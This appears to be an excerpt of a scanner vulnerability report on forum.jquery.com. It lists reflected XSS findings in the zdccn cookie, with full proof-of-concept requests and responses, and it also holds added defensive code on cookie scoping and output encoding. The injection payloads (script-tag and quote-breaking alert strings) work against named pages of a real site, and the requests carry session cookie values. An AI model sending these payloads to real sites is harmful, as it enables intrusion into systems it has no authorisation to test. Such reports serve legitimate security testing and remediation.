Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forum.jquery.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.3.10.1289872970; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=44433727; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbdde1c"><script>alert(1)</script>bcffdbcc616; JSESSIONID=AD357A14E7FC954350E517D74E9E548F

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 16 Nov 2010 02:07:57 GMT
Server: Apache-Coyote/1.1
Content-Length: 412118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbbdde1c"><script>alert(1)</script>bcffdbcc616"/>
...[SNIP]...

1.257. http://forum.jquery.com/about-the-jquery-forum [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /about-the-jquery-forum

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad6fc"-alert(1)-"9c813ee7210 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-the-jquery-forum HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbad6fc"-alert(1)-"9c813ee7210;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=70920BB9B56BD3667DF2EE884DAFA067; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:55 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbad6fc"-alert(1)-"9c813ee7210";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.258. http://forum.jquery.com/about-the-jquery-forum [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /about-the-jquery-forum

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aeb8"><script>alert(1)</script>184832e7612 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about-the-jquery-forum HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb5aeb8"><script>alert(1)</script>184832e7612;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7EB7A963D70AA3E56FC0F07732D1397D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:22 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb5aeb8"><script>alert(1)</script>184832e7612"/>
...[SNIP]...

1.259. http://forum.jquery.com/developing-jquery-mobile [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-mobile

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d758b"-alert(1)-"e6427185296 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /developing-jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbd758b"-alert(1)-"e6427185296;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B1851D64A27F36B930DCAEF3898C9B6D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:17 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbd758b"-alert(1)-"e6427185296";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.260. http://forum.jquery.com/developing-jquery-mobile [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-mobile

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 311ee"><script>alert(1)</script>6cdb7c6000b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /developing-jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb311ee"><script>alert(1)</script>6cdb7c6000b;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=23396E918BBDD8904130A3BB33771E7E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:53 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb311ee"><script>alert(1)</script>6cdb7c6000b"/>
...[SNIP]...

1.261. http://forum.jquery.com/developing-jquery-plugins [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-plugins

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be553"><script>alert(1)</script>91e09562bc7 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /developing-jquery-plugins HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbbe553"><script>alert(1)</script>91e09562bc7;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4C814B757E3C656BBED434A09213F398; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:50 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbbbe553"><script>alert(1)</script>91e09562bc7"/>
...[SNIP]...

1.262. http://forum.jquery.com/developing-jquery-plugins [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-plugins

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 946bd"-alert(1)-"b994d6d8afa was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /developing-jquery-plugins HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb946bd"-alert(1)-"b994d6d8afa;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=328343C6CE39774F99AF260DC4A2C71E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:28 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb946bd"-alert(1)-"b994d6d8afa";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.263. http://forum.jquery.com/jquery-conferences [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-conferences

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57d12"-alert(1)-"7bb6dad8c9c was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jquery-conferences HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb57d12"-alert(1)-"7bb6dad8c9c;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=338F51F237A44EA549C93AB697AB2730; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:37 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb57d12"-alert(1)-"7bb6dad8c9c";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.264. http://forum.jquery.com/jquery-conferences [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-conferences

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d363b"><script>alert(1)</script>211d0662176 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jquery-conferences HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbd363b"><script>alert(1)</script>211d0662176;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=01624F2138FC399220BA54BECC84BB4E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:05 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbbd363b"><script>alert(1)</script>211d0662176"/>
...[SNIP]...
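The paragraph above says the attacker first needs a way to plant the zdccn cookie in the victim's browser. The check below is an added example, not part of the report or of the forum software: it applies the RFC 6265 domain-matching and path-matching rules to decide whether a Set-Cookie response from some other host would be stored and then sent with GET /jquery-conferences on forum.jquery.com, and it shows how a planted cookie with a longer Path is ordered ahead of the legitimate one in the Cookie header. The hosts other.jquery.com and attacker.example, the tiny public-suffix list, and all cookie values are constructed for the example; whether any host under jquery.com can actually be made to emit such a header is not something the report establishes.

```javascript
// Added example, not part of the report: a minimal RFC 6265 cookie-scoping
// check for the question raised by cookie-sourced XSS, namely whether a cookie
// planted from some other origin would reach the vulnerable page.
// Hostnames other than forum.jquery.com are constructed for illustration.

// RFC 6265 s5.1.3: a host domain-matches a domain string if they are equal or
// the host ends with "." + domain (and the host is not an IP address).
function domainMatches(host, domain) {
  host = host.toLowerCase();
  domain = domain.toLowerCase().replace(/^\./, '');
  if (host === domain) return true;
  if (/^\d+(\.\d+){3}$/.test(host)) return false;
  return host.endsWith('.' + domain);
}

// RFC 6265 s5.1.4: a request path matches a cookie path if they are equal,
// the cookie path is a prefix ending in "/", or the character after the
// prefix in the request path is "/".
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || requestPath[cookiePath.length] === '/';
}

// Public suffixes a browser refuses as a cookie Domain. A real client uses the
// full Public Suffix List; this three-entry set is an assumption for the example.
const PUBLIC_SUFFIXES = new Set(['com', 'org', 'net']);

// Parse a Set-Cookie header into name, value, Domain and Path, applying the
// RFC 6265 defaults (host-only; default-path is the directory of the set URL).
function parseSetCookie(header, settingHost, settingPath) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq), value: pair.slice(eq + 1),
    domain: settingHost.toLowerCase(), hostOnly: true,
    path: settingPath.slice(0, settingPath.lastIndexOf('/')) || '/',
  };
  for (const a of attrs) {
    const [k, v = ''] = a.split('=');
    const key = k.toLowerCase();
    if (key === 'domain' && v) { cookie.domain = v.replace(/^\./, '').toLowerCase(); cookie.hostOnly = false; }
    if (key === 'path' && v.startsWith('/')) cookie.path = v;
  }
  return cookie;
}

// RFC 6265 s5.3: the browser stores a Domain cookie only if the setting host
// domain-matches the Domain attribute and that Domain is not a public suffix.
function browserAccepts(cookie, settingHost) {
  if (cookie.hostOnly) return true;
  if (PUBLIC_SUFFIXES.has(cookie.domain)) return false;
  return domainMatches(settingHost, cookie.domain);
}

// RFC 6265 s5.4: a stored cookie is attached to a request when the host
// matches (exactly for host-only cookies, domain-match otherwise) and the
// request path matches the cookie path.
function sentTo(cookie, host, path) {
  const hostOk = cookie.hostOnly ? host.toLowerCase() === cookie.domain
                                 : domainMatches(host, cookie.domain);
  return hostOk && pathMatches(path, cookie.path);
}

// The triage question: would a Set-Cookie emitted by settingHost (at
// settingPath) be stored and then sent with a request to targetHost/targetPath?
function reachesTarget(settingHost, settingPath, header, targetHost, targetPath) {
  const c = parseSetCookie(header, settingHost, settingPath);
  return browserAccepts(c, settingHost) && sentTo(c, targetHost, targetPath);
}

// RFC 6265 s5.4 step 2: cookies with longer paths are listed first, ties by
// creation time. A planted cookie with a more specific Path therefore appears
// before the legitimate one, and a server that takes the first zdccn gets it.
function cookieHeaderOrder(cookies) {
  return cookies.slice()
    .sort((a, b) => b.path.length - a.path.length || a.created - b.created)
    .map(c => c.name + '=' + c.value)
    .join('; ');
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed scenario: a sibling host under jquery.com sets a parent-domain cookie.
  console.log(reachesTarget('other.jquery.com', '/', 'zdccn=x"-alert(1)-"y; Domain=jquery.com; Path=/',
                            'forum.jquery.com', '/jquery-conferences'));
  console.log(cookieHeaderOrder([
    { name: 'zdccn', value: 'legit', path: '/', created: 1 },
    { name: 'zdccn', value: 'planted', path: '/jquery-conferences', created: 2 },
  ]));
}
```

The practical reading: a host-only cookie set by another host never reaches forum.jquery.com, and an unrelated origin cannot set Domain=jquery.com at all, so the finding is only exploitable against other users if some host under jquery.com can be made to emit a Set-Cookie for the parent domain (or the victim's cookie jar can be written some other way). Secure, HttpOnly and SameSite are left out because none of them change which host receives the cookie.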

1.265. http://forum.jquery.com/jquery-mobile [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-mobile

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57f5f"-alert(1)-"7e67dc4d73b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb57f5f"-alert(1)-"7e67dc4d73b;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D49EBF72C109638FD22383D812F53A25; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:07 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb57f5f"-alert(1)-"7e67dc4d73b";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...
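The findings in 1.264 (the hidden zdrpn input) and 1.265 (the csrfToken string literal) are the same cookie value landing in two output contexts, and the remediation text above asks for the script-context copy to be avoided or, failing that, encoded for that context. The block below is an added example, not Zoho's or jQuery's code: it reproduces the verbatim copy the report shows, renders the same value with attribute encoding and JavaScript string escaping, and checks each rendering the way a browser would treat it (the attribute value ends at the first quote; the inline script is executed with alert() replaced by a counting probe). renderUnsafe, renderSafe, audit and the UUID shape check are illustrative names; the two payloads are the ones from the report.

```javascript
// Added example, not Zoho/jQuery code: the zdccn -> zdrpn reflection from the
// report, reproduced with a naive template and then fixed with context-specific
// output encoding plus a shape check on the token. Names are illustrative.

const TOKEN = '62213a1a-db44-432f-a0e7-c5eb57ba4dbb';                     // legitimate value, from the report
const PAYLOAD_JS = TOKEN + '57f5f"-alert(1)-"7e67dc4d73b';                  // issue 1.265, JS string sink
const PAYLOAD_ATTR = TOKEN + 'd363b"><script>alert(1)</script>211d0662176'; // issue 1.264, attribute sink

// What the report shows the application doing: the cookie value is pasted
// into both sinks unmodified.
function renderUnsafe(zdccn) {
  return '<input type="hidden" name="zdrpn" value="' + zdccn + '"/>\n' +
         '<script>var csrfToken = "' + zdccn + '";</script>';
}

// HTML attribute context: entity-encode the characters that can close a
// double-quoted attribute, open a tag, or start an entity.
const ATTR_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, c => ATTR_MAP[c]);
}

// JavaScript string-literal context: hex-escape everything outside
// [A-Za-z0-9], so neither a quote nor "</script>" can occur inside the literal.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? '\\x' + code.toString(16).padStart(2, '0')
                        : '\\u' + code.toString(16).padStart(4, '0');
  });
}

function renderSafe(zdccn) {
  return '<input type="hidden" name="zdrpn" value="' + encodeHtmlAttr(zdccn) + '"/>\n' +
         '<script>var csrfToken = "' + encodeJsString(zdccn) + '";</script>';
}

// First gate, before any template: the token has a fixed shape (a UUID), so
// anything else arriving in the cookie can simply be rejected.
const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
function isValidToken(zdccn) {
  return UUID_RE.test(zdccn);
}

// --- Checks that model what a browser does with each rendering ---

// The attribute value a browser sees: everything up to the next '"'.
function attrValueOf(html) {
  const m = /name="zdrpn" value="([^"]*)"/.exec(html);
  return m ? m[1] : null;
}
function decodeHtmlAttr(s) {
  return s.replace(/&(amp|lt|gt|quot|#x27);/g,
    (_, e) => ({ amp: '&', lt: '<', gt: '>', quot: '"', '#x27': "'" })[e]);
}

// Execute the first inline script the way a page would, with alert() replaced
// by a probe that counts calls. Returns { fired, csrfToken }.
function runInlineScript(html) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  const probe = { fired: 0, csrfToken: undefined };
  const fn = new Function('alert',
    m[1] + ';\nreturn typeof csrfToken === "undefined" ? undefined : csrfToken;');
  probe.csrfToken = fn(() => { probe.fired++; return 0; });
  return probe;
}

// Render with the given template and report what the browser would end up with.
function audit(render, zdccn) {
  const html = render(zdccn);
  const raw = attrValueOf(html);
  const script = runInlineScript(html);
  return { attrValue: raw === null ? null : decodeHtmlAttr(raw),
           fired: script.fired, csrfToken: script.csrfToken };
}

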